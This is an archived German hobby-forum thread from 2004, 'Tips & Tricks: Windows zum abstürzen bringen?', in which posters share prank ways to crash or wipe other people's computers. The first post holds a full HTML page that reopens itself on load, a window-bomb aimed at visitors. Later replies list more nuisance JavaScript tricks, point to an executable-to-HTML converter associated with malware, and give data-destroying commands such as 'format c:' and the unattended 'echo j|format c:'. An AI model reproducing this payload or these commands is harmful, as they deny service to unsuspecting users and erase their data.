Tips & Tricks: Windows zum abstürzen bringen ?

Blood Board
Verfügbare Informationen zu "Tips & Tricks: Windows zum abstürzen bringen ?"

  • Qualität des Beitrags: 0 Sterne
  • Beteiligte Poster: HPScript Entwicklung - darmzerfetzer - GhosT - 4fr0
  • Forum: Blood Board
  • Forenbeschreibung: Multifunction-Board: Metal, Tasteless, Computer
  • aus dem Unterforum: HTML
  • Antworten: 6
  • Forum gestartet am: Montag 16.08.2004
  • Sprache: deutsch
  • Link zum Originaltopic: Tips & Tricks: Windows zum abstürzen bringen ?
  • Letzte Antwort: vor 19 Jahren, 5 Monaten, 29 Tagen, 20 Stunden, 17 Minuten
  • Alle Beiträge und Antworten zu "Tips & Tricks: Windows zum abstürzen bringen ?"

    Re: Tips & Tricks: Windows zum abstürzen bringen ?

    HPScript Entwicklung - 19.08.2004, 11:11

    Tips & Tricks: Windows zum abstürzen bringen ?
    Tips & Tricks

    Wie kann ich Windows zum abstürze bringen ?

    Das geht ganz einfach mit Javascript. Allerdings funktioniert es auch nur bei etwas älteren Rechnern, die nicht soviel Leistung haben, aber lustig und nervig ist es!

    crash.htm
    Code:
    ...
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <title>Windows Crash</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    </head>
    <script>
       function CrashWindows(){
         window.open("crash.htm","","");
       }
    </script>
    <body onLoad="javascript:CrashWindows();">
    Hahaha ! Du bist im Arsch!
    </body>
    </html>
    ...



    Re: Tips & Tricks: Windows zum abstürzen bringen ?

    darmzerfetzer - 22.08.2004, 15:49

    Crash-HTML
    Nicht schlecht .... kleine info noch dazu: es gibt natürlich noch viele andere crash-funktionen:

    1. Unendlich Meldungen (Mit JS-Befehl alert)
    2. Zitterndes Fenster
    3. Fenster, welches sich nach beenden wieder öffnet
    4. Fenster, welches vor Cursor abhaut.

    Am Besten besorgt man sich nen fettes Hacker-Buch, da stehn immer solche Dinge drin. Für angehende Hacker gut geeignet, für Profis net.

    Wer aber wirklich Computer crashen will wird wohl ziemlich große Schwierigkeiten haben. Ein gutes Tool übrigens ist EXE2HTML - dies konvertiert Executables in HTMLs. Wird allerdings mittlerweile von Script-Blockern und AVPs anerkannt. Wer danach sucht, wird wohl ziemlich viel Malware begegnen. Ich empfehle allerdings nicht, VBS in die HTMLs einzubauen ... damit kann man zwar am meisten anstellen aber es ist Standard bei Windows deaktiviert (in HTMLs) - naja ... alsdann

    cu :twisted:



    Re: Tips & Tricks: Windows zum abstürzen bringen ?

    GhosT - 27.08.2004, 03:47


    HEHE :twisted: das liebe ich immer gegen windoof und bill (wie) gaytes :lol:

    aber pssst nicht veraten es geht noch einfacher hehe

    macht mal während windoof läuft ne dos box auf dann tippt ein format c:

    und alles schön bestätigen.

    vorher backupen der wichtigen daten natürlich.

    ergebnis Festplatte c: ist leer gefegt in windoof funzt nix mehr aber die GUI steht noch LOOOOL habs mal probiert als ich keine start disk hatte und un bedingt den rechner neu machen musste.



    Re: Tips & Tricks: Windows zum abstürzen bringen ?

    4fr0 - 27.09.2004, 13:52


    format c: funktioniert nur leider bei winxp nicht mehr mit einem befehl. bei alten versionen konnte man ja noch so schön echo j|format c: eingeben :D



    Re: Tips & Tricks: Windows zum abstürzen bringen ?

    GhosT - 27.09.2004, 15:04


    lol hast du dein windoof schon verstümmelt?

    also wenn ich ne dosbox aufmach und format c: eingebe funzt das sofort

    (ps habs mit nem 2ten rechner gerade getestet)



    Re: Tips & Tricks: Windows zum abstürzen bringen ?

    darmzerfetzer - 27.09.2004, 15:10


    hmmm ... ich gebe 4fr0 recht - versuchs mal mit ner batch, in die du format c: eingibst ... geht net! versuchs danach bei allen systemen mit echo j|format c: - komisch bei allem außer winxp gehts. bei xp fragt er nämlich hd-infos etc. ab bei 2k etc. muss man nur mit j bestätigen. nachzulesen in meinem batchprogrammierungstutorial im easy sdk unter downloads .............. kannste aber auch in ausführen eingeben (windooftaste + r) ^^ geht da auch (is auch ohne console möglich *gg*



    Mit folgendem Code, können Sie den Beitrag ganz bequem auf ihrer Homepage verlinken



    Weitere Beiträge aus dem Forum Blood Board

    C++: Compiler benötigt... - gepostet von Devil666 am Mittwoch 25.08.2004



    Ähnliche Beiträge wie "Tips & Tricks: Windows zum abstürzen bringen ?"

    Booster Tricks: - kai kuster (Donnerstag 15.03.2007)
    Tipps und Tricks - Profizocker (Dienstag 29.03.2005)
    So sollte ein DF60-B aussehen! Brauch aber noch Tips. - Kaputzo (Freitag 16.03.2007)
    Tricks und mehr - shaddow1991 (Dienstag 27.03.2007)
    Tips und Tricks - ganjaa (Sonntag 25.03.2007)
    Wer hat noch ne Windows cd? - FlAcHmAnN (Montag 04.02.2008)
    Tips zum Umgang mit Windows Server 2003 - mcsalinux (Freitag 09.03.2007)
    Windows XP 64 - Michael Teichert (Donnerstag 16.02.2006)
    WINDOWS XP PERFEKT INSTALLIEREN - xlimited (Samstag 22.01.2005)
    Tips für Reifen - Panda2409 (Donnerstag 23.11.2006)